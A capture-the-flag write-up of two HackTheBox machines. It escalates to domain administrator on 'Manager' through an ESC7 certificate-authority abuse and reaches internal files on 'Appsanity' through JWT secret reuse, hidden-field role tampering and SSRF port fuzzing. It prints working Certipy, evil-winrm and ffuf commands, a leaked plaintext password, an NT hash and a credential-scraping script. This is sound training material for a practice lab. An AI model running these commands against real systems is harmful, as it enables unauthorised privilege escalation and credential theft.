<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>
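If I wanted to script pulling creds out of config files like this, the access-user element parses out easily with Python’s ElementTree (tag names taken from the file above, with the XML trimmed down for the sketch):

```python
import xml.etree.ElementTree as ET

# Trimmed version of .old-conf.xml from the backup
conf = """<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <server>
    <host>dc01.manager.htb</host>
    <access-user>
      <user>raven@manager.htb</user>
      <password>R4v3nBe5tD3veloP3r!123</password>
    </access-user>
  </server>
</ldap-conf>"""

root = ET.fromstring(conf)
user = root.findtext("./server/access-user/user")
password = root.findtext("./server/access-user/password")
print(f"{user}:{password}")  # raven@manager.htb:R4v3nBe5tD3veloP3r!123
```

Grepping for tags like password, user, or pass across an extracted backup is a quick way to triage files like this at scale.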
The LDAP enumeration showed that raven is in the Remote Management Users group, which means they should be able to WinRM. netexec confirms this password works:
oxdf@hacky$ netexec winrm manager.htb -u raven -p 'R4v3nBe5tD3veloP3r!123'
WINRM 10.10.11.236 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
WINRM 10.10.11.236 5985 DC01 [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123 (Pwn3d!)
I’m able to connect and get a shell:
oxdf@hacky$ evil-winrm -i manager.htb -u raven -p 'R4v3nBe5tD3veloP3r!123'
Evil-WinRM shell v3.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents>
And grab user.txt:
*Evil-WinRM* PS C:\Users\Raven\Desktop> type user.txt
6e6a6b72************************
raven’s home directory is otherwise completely empty:
*Evil-WinRM* PS C:\Users\Raven> ls -recurse .
Directory: C:\Users\Raven
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/27/2023 8:24 AM Desktop
d-r--- 7/27/2023 8:23 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
Directory: C:\Users\Raven\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/12/2024 9:21 PM 34 user.txt
There are no other user directories, and the web directory doesn’t have anything else interesting.
With a Windows domain, the next thing to check used to be Bloodhound, but lately it’s worth checking Active Directory Certificate Services (ADCS) as well, and that’s quick, so I’ll start there. This can be done by uploading Certify, or remotely with Certipy. I find Certipy easier.
I’ll look for vulnerable templates:
oxdf@hacky$ certipy find -dc-ip 10.10.11.236 -ns 10.10.11.236 -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
The last line is the most important! Raven has dangerous permissions, with the label ESC7.
ESC7 is when a user has either the “Manage CA” or “Manage Certificates” access rights on the certificate authority itself. Raven has ManageCa rights (shown in the output above).
The steps to exploit this are on the Certipy README.
First, I’ll need to use the Manage CA permission to give Raven the Manage Certificates permission:
oxdf@hacky$ certipy ca -ca manager-DC01-CA -add-officer raven -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
Now Raven shows up there where they didn’t before:
oxdf@hacky$ certipy find -dc-ip 10.10.11.236 -ns 10.10.11.236 -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -vulnerable -stdout
...[snip]...
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
...[snip]...
These permissions get reset periodically, so if some step breaks while exploiting, it's worth checking back here to see if that's why.
The first step is to request a certificate based on the Subordinate Certification Authority (SubCA) template provided by ADCS. The SubCA template serves as a predefined set of configurations and policies governing the issuance of certificates.
oxdf@hacky$ certipy req -ca manager-DC01-CA -target dc01.manager.htb -template SubCA -upn administrator@manager.htb -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 13
Would you like to save the private key? (y/N) y
[*] Saved private key to 13.key
[-] Failed to request certificate
This fails, but it saves the private key involved. Then, using the Manage CA and Manage Certificates privileges, I’ll use the ca
subcommand to issue the request:
oxdf@hacky$ certipy ca -ca manager-DC01-CA -issue-request 13 -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
Now, the issued certificate can be retrieved using the req
command:
oxdf@hacky$ certipy req -ca manager-DC01-CA -target dc01.manager.htb -retrieve 13 -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 13
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '13.key'
[*] Saved certificate and private key to 'administrator.pfx'
With this certificate as the administrator user, the easiest way to get a shell is to use it to get the NTLM hash for the user with the auth
command. This requires the VM and target times to be in sync; otherwise it leads to this failure:
oxdf@hacky$ certipy auth -pfx administrator.pfx -dc-ip manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[-] Got error: nameserver manager.htb is not an IP address or valid https URL
[-] Use -debug to print a stacktrace
I’ll use ntpdate
to sync my VM’s time to Manager’s:
oxdf@hacky$ sudo ntpdate 10.10.11.236
13 Mar 17:17:40 ntpdate[252490]: step time server 10.10.11.236 offset +25191.022331 sec
Now it works, leaking the hash:
oxdf@hacky$ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
With the hash, I can get a shell as administrator using Evil-WinRM:
oxdf@hacky$ evil-winrm -i manager.htb -u administrator -H ae5064c2f62317332c88629e025924ef
Evil-WinRM shell v3.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
And grab root.txt
:
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
589f36d6************************
Appsanity starts with two websites that share a JWT secret, so I can get a cookie from one and use it on the other. On the first, I'll register an account and abuse a hidden input vulnerability to get elevated privileges as a doctor role. Then I'll use that cookie on the other site to get access, where I find a server-side request forgery, as well as a way to upload PDFs. I'll bypass a filter to upload a webshell, and use the SSRF to reach the internal management page and trigger a reverse shell. From there, I'll find the location of credentials in a .NET application, and extract a password from the registry to get another shell. Finally, I'll reverse a C++ binary using ProcMon, Ghidra, and x64dbg to figure out a location where I can write a DLL and trigger its loading, giving a shell as administrator.
| Name | Appsanity (Play on HackTheBox) |
|---|---|
| Release Date | 28 Oct 2023 |
| Retire Date | 09 Mar 2024 |
| OS | Windows |
| Base Points | Hard [40] |
| Rated Difficulty | |
| Radar Graph | |
| 02:23:37 | |
| 03:57:12 | |
| Creator | |
nmap
finds three open TCP ports, HTTP (80), HTTPS (443), and WinRM (5985):
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.238
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 14:02 EST
Nmap scan report for 10.10.11.238
Host is up (0.11s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 13.68 seconds
oxdf@hacky$ nmap -p 80,443,5985 -sCV 10.10.11.238
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 14:04 EST
Nmap scan report for 10.10.11.238
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to https://meddigi.htb/
443/tcp open https?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.57 seconds
This is clearly a Windows host, Windows 10/11 or Server 2016+. The website on port 80 is redirecting to https://meddigi.htb
. The site on 443 returns nothing.
Visiting http://10.10.11.238
immediately returns a 302 redirect to https://meddigi.htb
, just as nmap
showed. Interestingly, visiting https://10.10.11.238
just crashes:
I suspect they meant to have a redirect up here as well.
I’ll try to fuzz subdomains on both HTTP and HTTPS. On HTTP, it finds nothing:
oxdf@hacky$ ffuf -u http://10.10.11.238 -H "Host: FUZZ.meddigi.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.238
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.meddigi.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
________________________________________________
:: Progress: [19966/19966] :: Job [1/1] :: 357 req/sec :: Duration: [0:00:57] :: Errors: 0 ::
On HTTPS, every single request fails in an error:
oxdf@hacky$ ffuf -u https://10.10.11.238 -H "Host: FUZZ.meddigi.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : https://10.10.11.238
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.meddigi.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
________________________________________________
:: Progress: [19966/19966] :: Job [1/1] :: 89 req/sec :: Duration: [0:03:44] :: Errors: 19966 ::
I’ll add meddigi.htb
to my /etc/hosts
file:
10.10.11.238 meddigi.htb
If I now fuzz again targeting https://meddigi.htb
, it doesn’t error, and does find another subdomain:
oxdf@hacky$ ffuf -u https://meddigi.htb -H "Host: FUZZ.meddigi.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : https://meddigi.htb
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.meddigi.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
________________________________________________
portal [Status: 200, Size: 2976, Words: 1219, Lines: 57, Duration: 3315ms]
:: Progress: [19966/19966] :: Job [1/1] :: 88 req/sec :: Duration: [0:04:02] :: Errors: 0 ::
I’ll add portal.meddigi.htb
to my hosts
file as well.
The TLS certificate on 443 shows the same hostname, meddigi.htb
:
The site is for a medical consulting company:
There’s not too much of interest on the site, but I can register an account. On doing so and logging in, there’s a profile page (/Profile
):
Not much here. I can send a message to the supervisors, but no XSS payloads seem to connect back.
The HTTP response headers show again that this is IIS:
HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
Strict-Transport-Security: max-age=2592000
Set-Cookie: .AspNetCore.Mvc.CookieTempDataProvider=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/; samesite=lax; httponly
Date: Wed, 28 Feb 2024 19:53:24 GMT
On the initial visit (before logging in) it sets a blank .AspNetCore.Mvc.CookieTempDataProvider
cookie, which suggests this is an ASP.NET application. That cookie does get set while browsing around the site.
I’m not able to guess any extensions. On a bad page, it just redirects to /Home
.
On logging in, another cookie is set:
HTTP/2 302 Found
Location: /Profile
Server: Microsoft-IIS/10.0
Strict-Transport-Security: max-age=2592000
Set-Cookie: access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjciLCJlbWFpbCI6IjB4ZGZAbWVkZGlnaS5odGIiLCJuYmYiOjE3MDkxNTE0MzgsImV4cCI6MTcwOTE1NTAzOCwiaWF0IjoxNzA5MTUxNDM4LCJpc3MiOiJNZWREaWdpIiwiYXVkIjoiTWVkRGlnaVVzZXIifQ.mMHBaemx7FjdgSR90NdIgfLPoB9_fjbrEqvGFJbqokc; expires=Wed, 28 Feb 2024 22:17:18 GMT; path=/; secure; samesite=strict; httponly
Date: Wed, 28 Feb 2024 20:17:18 GMT
That’s a JWT set as the access_token
, which decodes to:
{
"unique_name": "7",
"email": "0xdf@meddigi.htb",
"nbf": 1709151438,
"exp": 1709155038,
"iat": 1709151438,
"iss": "MedDigi",
"aud": "MedDigiUser"
}
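Decoding a JWT payload needs nothing beyond the standard library, since each segment is just base64url-encoded JSON with the `=` padding stripped. A quick sketch, round-tripping the claims shown above:

```python
import base64
import json

def decode_jwt_segment(segment: str) -> dict:
    """Decode one base64url JWT segment, restoring the stripped '=' padding."""
    padded = segment + "=" * (-len(segment) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))

# Round-trip the claims from the decoded token above
claims = {"unique_name": "7", "email": "0xdf@meddigi.htb", "iss": "MedDigi", "aud": "MedDigiUser"}
segment = base64.urlsafe_b64encode(json.dumps(claims).encode()).decode().rstrip("=")
assert decode_jwt_segment(segment) == claims
```

Sites like jwt.io do the same thing, but this is handy for scripting.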
I’ll run feroxbuster
against the site, using a lowercase wordlist as IIS isn’t case sensitive. It doesn’t return anything I don’t already know about:
oxdf@hacky$ feroxbuster -u https://meddigi.htb -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.3
───────────────────────────┬──────────────────────
🎯 Target Url │ https://meddigi.htb
🚀 Threads │ 50
📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
302 GET 2l 10w 147c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 514l 1889w 32809c https://meddigi.htb/
200 GET 8l 14w 194c https://meddigi.htb/error
200 GET 514l 1889w 32809c https://meddigi.htb/home
302 GET 0l 0w 0c https://meddigi.htb/profile => https://meddigi.htb/Home
200 GET 108l 472w 7847c https://meddigi.htb/signup
200 GET 76l 204w 3792c https://meddigi.htb/signin
400 GET 6l 26w 324c https://meddigi.htb/error%1F_log
[####################] - 1m 26584/26584 0s found:7 errors:0
[####################] - 1m 26584/26584 420/s https://meddigi.htb/
/error
returns:
The site presents a login form:
To log in, I’ll need an email and “Doctor Ref.Number”.
The HTTP response headers look exactly the same as the main site:
HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
Strict-Transport-Security: max-age=2592000
Set-Cookie: .AspNetCore.Mvc.CookieTempDataProvider=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/; samesite=lax; httponly
Date: Wed, 28 Feb 2024 20:12:01 GMT
feroxbuster
finds a couple endpoints that require auth (302 redirects to /Login
), but not much else:
oxdf@hacky$ feroxbuster -u https://portal.meddigi.htb -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.3
───────────────────────────┬──────────────────────
🎯 Target Url │ https://portal.meddigi.htb
🚀 Threads │ 50
📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
302 GET 2l 10w 155c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 57l 162w 2976c https://portal.meddigi.htb/
200 GET 57l 162w 2976c https://portal.meddigi.htb/login
200 GET 8l 14w 194c https://portal.meddigi.htb/error
302 GET 0l 0w 0c https://portal.meddigi.htb/profile => https://portal.meddigi.htb/Login
302 GET 0l 0w 0c https://portal.meddigi.htb/equipment => https://portal.meddigi.htb/Login
302 GET 0l 0w 0c https://portal.meddigi.htb/scheduler => https://portal.meddigi.htb/Login
400 GET 6l 26w 324c https://portal.meddigi.htb/error%1F_log
[####################] - 1m 26584/26584 0s found:7 errors:0
[####################] - 1m 26584/26584 425/s https://portal.meddigi.htb/
Looking at the POST request to register an account, there’s an interesting field in the body:
POST /Signup/SignUp HTTP/2
Host: meddigi.htb
Cookie: .AspNetCore.Antiforgery.ML5pX7jOz00=CfDJ8G5wpJNGr61AqaSs4NeQzGECU5I-qpOUJ4m4QT6B8N0jzDeFYOrDeYjnpAqfLxfAKWZz-odFKvD48Ht6m4HwKivMzkuFPoGFpANf8KiNS5FbqRMt7Z89Z7Ky3hDJyB9BKKEYWdvEfnZu1lZbgg3_K_M
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 338
Origin: https://meddigi.htb
Referer: https://meddigi.htb/signup
Name=df&LastName=df&Email=0xdf%40meddigi.htb&Password=0xdf0xdf&ConfirmPassword=0xdf0xdf&DateOfBirth=2000-01-01&PhoneNumber=1111111111&Country=usa&Acctype=1&__RequestVerificationToken=CfDJ8G5wpJNGr61AqaSs4NeQzGHnf8qh8M3yVMWpESf7wR0J44Sj7nle56Z34HuOgerWHBH4HwQFqKqIakDHJ9mPiFvbc2a7ZP4s6KXa1yeinoEqXfL1dSiyLqXl-adU1xY8TomxlMbnRO4CyHUMk4ypUKA
In addition to the data entered in the form, there’s a Acctype
parameter. That comes from a hidden input
tag in the HTML form:
<input type="hidden" data-val="true" data-val-required="The Acctype field is required." id="Acctype" name="Acctype" value="1" />
The response to a successful signup is a 302 redirect to /Signin
.
I’ll send this request to Burp Repeater and mess with that a bit. If I set it to 0, the response is a 302 redirect to /Signup
. This implies failure registering.
If I change that to 2, it redirects to /Signin
:
Going up to 3 leads back to /Signup
, so it seems like 1 and 2 are the only valid values here.
If I log in with the account created with type 2, now it shows the account is a Doctor:
There’s not much else here. I can add patients to be supervised, but it doesn’t seem to do much.
The tech stacks of the two websites seem very similar. Thinking about the JWT that gets set when I log in on the main site, if the portal site was written by the same developers, it could have used the same signing secret and the same cookie name. If that’s the case, the cookie generated by one would be valid on the other.
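The reason a shared HS256 secret makes the token portable is that the signature is just an HMAC-SHA256 over header.payload: any service holding the same secret computes the same MAC and accepts the token. A self-contained sketch of that check (the secret here is a placeholder, not the box's):

```python
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode().rstrip("=")

def sign_hs256(claims: dict, secret: bytes) -> str:
    """Build a minimal HS256 JWT: header.payload.signature."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    sig = b64url(hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest())
    return f"{header}.{payload}.{sig}"

def verify_hs256(token: str, secret: bytes) -> bool:
    header, payload, sig = token.split(".")
    expected = b64url(hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest())
    return hmac.compare_digest(sig, expected)

# Two "sites" sharing one secret will each accept the other's tokens
shared = b"not-the-real-meddigi-secret"  # placeholder, not the box's key
token = sign_hs256({"email": "0xdf@meddigi.htb", "iss": "MedDigi"}, shared)
assert verify_hs256(token, shared)        # the portal accepts the main site's token
assert not verify_hs256(token, b"other")  # a different secret would reject it
```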
I’ll go into the dev tools and create a cookie for portal.meddigi.htb
, placing the doctor level cookie from the other site in there:
On refreshing, the browser redirects to /Profile
:
It’s the same info as the other site as well!
Each of the items in the menu bar on the left have different forms that can be submitted. The two most interesting are “Issue Prescriptions” (/Prescriptions
) and “Upload Report” (/examreport
).
The Prescriptions page is interesting because one of the items it takes is a link:
Any time I can submit a link to a site it’s worth digging into. If I put in my host as the link:
On hitting submit, it contacts my Python webserver:
10.10.11.238 - - [28/Feb/2024 20:58:55] code 404, message File not found
10.10.11.238 - - [28/Feb/2024 20:58:55] "GET /prescriptions HTTP/1.1" 404 -
And displays the result:
If I create that page:
oxdf@hacky$ echo "<h1>Test Page</h1>" > prescriptions
On submitting again, it shows the page:
Looks like a solid server-side request forgery (SSRF).
The Reporting page allows for file upload:
I’ll fill it out, and after passing all the client-side validation, submit, and it returns:
If I use a PDF, it shows:
I’ve already shown an SSRF above in the Prescriptions panel. I’ll use that to fuzz listening ports on the internal network, in this case on localhost.
This command is a bit tricky to build, so I’ll work up to it slowly. I’ll start by getting rid of headers in the request to make sure I know which ones actually matter. I’ll submit in the site, and send the request to Repeater. Then I can get rid of a couple headers, send, and make sure the response is the same. That confirms I can get rid of those headers. Content-Type
is a good one to notice - without that the request fails. I’ll need that when I craft a ffuf
command.
In Repeater, I’ll look at what happens with it requests a link on a listening port on my host:
It’s a 200 response, with the actual HTML from my host in the body. It’s also a very fast response, about 3.5 seconds.
If I change that to a port that’s not listening (81), it returns a 302 to /Error
:
It also takes about 2.7 seconds just to fail. That makes sense, as it's trying to connect and waiting for a timeout before redirecting.
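That status/timing difference is the whole oracle. A tiny sketch of the decision rule I'm relying on (the threshold is illustrative):

```python
def classify_port(status: int, seconds: float) -> str:
    """Interpret one SSRF response: open ports return a 200 with the fetched
    content; closed ports redirect (302) to /Error after a connect timeout."""
    if status == 200:
        return "open"
    if status == 302:
        return "closed" if seconds > 1.0 else "error page"  # illustrative cutoff
    return "unknown"

assert classify_port(200, 0.5) == "open"
assert classify_port(302, 2.7) == "closed"
```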
My initial gut was to scan all 65535 ports, but that proved way too slow, especially because I want to fuzz on both HTTP and HTTPS. I’ll start with a wordlist from SecLists, common-http-ports.txt
. I’ll need to include:
-d 'Email=0xdf@meddigi.htb&Link=http(s)://127.0.0.1:FUZZ' - The data in the POST request.
-w common-http-ports.txt - The wordlist.
-u https://portal.meddigi.htb/Prescriptions/SendEmail - The URL to target.
-H 'Content-Type: application/x-www-form-urlencoded' - The Content-Type header.
-mc 200 - Filter to show only HTTP 200 responses.
-b "access_token=$token" - My cookie, which I'm storing in a Bash variable to make the command more manageable.
On HTTPS it finds nothing:
oxdf@hacky$ ffuf -d 'Email=0xdf@meddigi.htb&Link=https://127.0.0.1:FUZZ' -w /opt/SecLists/Discovery/Infrastructure/common-http-ports.txt -u 'https://portal.meddigi.htb/Prescriptions/SendEmail' -H 'Content-Type: application/x-www-form-urlencoded' -mc 200 -b "access_token=$token"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : POST
:: URL : https://portal.meddigi.htb/Prescriptions/SendEmail
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Infrastructure/common-http-ports.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Header : Cookie: access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjciLCJlbWFpbCI6IjB4ZGYyQG1lZGRpZ2kuaHRiIiwibmJmIjoxNzA5MzIyMzM5LCJleHAiOjE3MDkzMjU5MzksImlhdCI6MTcwOTMyMjMzOSwiaXNzIjoiTWVkRGlnaSIsImF1ZCI6Ik1lZERpZ2lVc2VyIn0.ofzJS2ZE7OOwdsRRZ98daXdA8OkQ3kbEuNYEtRnZLR4
:: Data : Email=0xdf@meddigi.htb&Link=https://127.0.0.1:FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
________________________________________________
:: Progress: [35/35] :: Job [1/1] :: 5 req/sec :: Duration: [0:00:08] :: Errors: 0 ::
On HTTP, it finds 8080:
oxdf@hacky$ ffuf -d 'Email=0xdf@meddigi.htb&Link=http://127.0.0.1:FUZZ' -w /opt/SecLists/Discovery/Infrastructure/common-http-ports.txt -u 'https://portal.meddigi.htb/Prescriptions/SendEmail' -H 'Content-Type: application/x-www-form-urlencoded' -mc 200 -b "access_token=$token"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : POST
:: URL : https://portal.meddigi.htb/Prescriptions/SendEmail
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Infrastructure/common-http-ports.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Header : Cookie: access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjciLCJlbWFpbCI6IjB4ZGYyQG1lZGRpZ2kuaHRiIiwibmJmIjoxNzA5MzIyMzM5LCJleHAiOjE3MDkzMjU5MzksImlhdCI6MTcwOTMyMjMzOSwiaXNzIjoiTWVkRGlnaSIsImF1ZCI6Ik1lZERpZ2lVc2VyIn0.ofzJS2ZE7OOwdsRRZ98daXdA8OkQ3kbEuNYEtRnZLR4
:: Data : Email=0xdf@meddigi.htb&Link=http://127.0.0.1:FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
________________________________________________
8080 [Status: 200, Size: 2060, Words: 688, Lines: 54, Duration: 3565ms]
:: Progress: [35/35] :: Job [1/1] :: 1 req/sec :: Duration: [0:00:20] :: Errors: 1 ::
Back in the browser, I’ll submit http://127.0.0.1:8080
as the prescription url:
Interestingly, not only does it show a line that’s always there, but the second line in this table is a report I’ve recently uploaded! If I scroll over, there’s a link to the PDF:
I can grab the URL from that, and back in Repeater, fetch the PDF:
At this point, I have access to files that I upload.
